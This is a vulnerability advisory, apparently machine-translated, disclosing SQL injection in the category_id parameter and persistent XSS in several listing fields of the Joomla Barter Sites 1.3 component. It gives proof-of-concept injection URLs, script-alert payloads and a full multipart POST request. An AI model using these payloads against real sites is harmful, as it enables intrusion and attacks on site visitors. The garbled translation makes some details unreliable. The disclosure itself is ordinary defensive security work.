Joomla component Barter Sites more than 1.3 defects and repair

 

Barter Sites 1.3 Component Joomla SQL Injection & Persistent XSS vulnerabilities

######################################## ######################################## ####

Product: Barter Sites

Platform: Joomla

Affected Versions: 1.3

Security category: SQL Injection & Persistent XSS

: Www.barter-sites.com/content/getStarted

I. BACKGROUND

 

The Barter Sites extension is for operating a trade group.

Members post listings in the barter directory on your site,

Send each other offers and messages, negotiate, and 'pay'

With either direct trade or with your own private digital

Currency called trade credits. You can even issue lines

Credit.

 

Admin has the option to earn commissions on trade credit

Transfers and can run transactions for the members, serving

As a barter broker.

 

Features Include:

 

* HTML Listings

* Barter Wish-list

* Direct Trade Offers

* Virtual Private Currency

* Trade Credit Transfers

* Admin Broker/Transfer

* Generate Invoices

* Paypal Commissions

* Member Reputations

* Private Messaging

* And more!

 

II. DESCRIPTION

 

Two vulnerabilities discovered

-Category_id Parameter SQL injection

-XSS in several places

 

 

III. EXPLOITATION

 

* INJECTION SQL

 

Parameter [category_id]:

 

/Index. php? Option = com_listing & task = browse & category_id = 1 [SQL]

 

[SQL] = Injection SQL

 

 

* Persistent XSS main www.2cto.com

 

Register-> Login ---> barter> Post: or/index. php? Option = com_listing & task = post & Itemid = 2

Listing Title: <SCRIPT> alert ("XSS") </SCRIPT>

Selection category.

 

XSS look at: barter> selection category

 

----> To view the xss is not necessary to be registered

 

 

* Persistent XSS side

 

In the form of the Post, you can insert xss in all settings:

-Website Address

-Payment types accepted

-Billing Price

-Shipping Cost

-Quantity

All can be inserted into the header, but for Facilides directly on the form

 

All: <SCRIPT> alert ("XSS") </SCRIPT>

 

 

 

* Persistent XSS in pictures

 

If you prefer pictures to insert in the xss edit header values as follows:

 

Get:/index. php? Option = com_listing & task = listingsave

Post:

 

--------------------------------- 106542362324353 \ r \ n

Content-Disposition: form-data; name = "listing_title" \ r \ n

\ R \ n

\ R \ n

--------------------------------- 106542362324353 \ r \ n

Content-Disposition: form-data; name = "description" \ r \ n

\ R \ n

<P> <SCRIPT> alert (" XSS ") </SCRIPT> </p> \ r \ n <--------------------------------- click here

--------------------------------- 106542362324353 \ r \ n

Content-Disposition: form-data; name = "homeurl" \ r \ n

\ R \ n

\ R \ n

--------------------------------- 106542362324353 \ r \ n

Content-Disposition: form-data; name = "category_id" \ r \ n

\ R \ n

34 \ r \ n

--------------------------------- 106542362324353 \ r \ n

Content-Disposition: form-data; name = "paystring" \ r \ n

\ R \ n

\ R \ n

--------------------------------- 106542362324353 \ r \ n

Content-Disposition: form-data; name = "sell_price" \ r \ n

\ R \ n

\ R \ n

--------------------------------- 106542362324353 \ r \ n

Content-Disposition: form-data; name = "shipping_cost" \ r \ n

\ R \ n

\ R \ n

--------------------------------- 106542362324353 \ r \ n

Content-Disposition: form-data; name = "quantity" \ r \ n

\ R \ n

\ R \ n

--------------------------------- 106542362324353 \ r \ n

Content-Disposition: form-data; name = "submit" \ r \ n

\ R \ n

Submit \ r \ n

--------------------------------- 106542362324353 \ r \ n

Content-Disposition: form-data; name = "listing_id" \ r \ n

\ R \ n

\ R \ n

--------------------------------- 106542362324353 -- \ r \ n

 

 

Discovered.

Chris Russell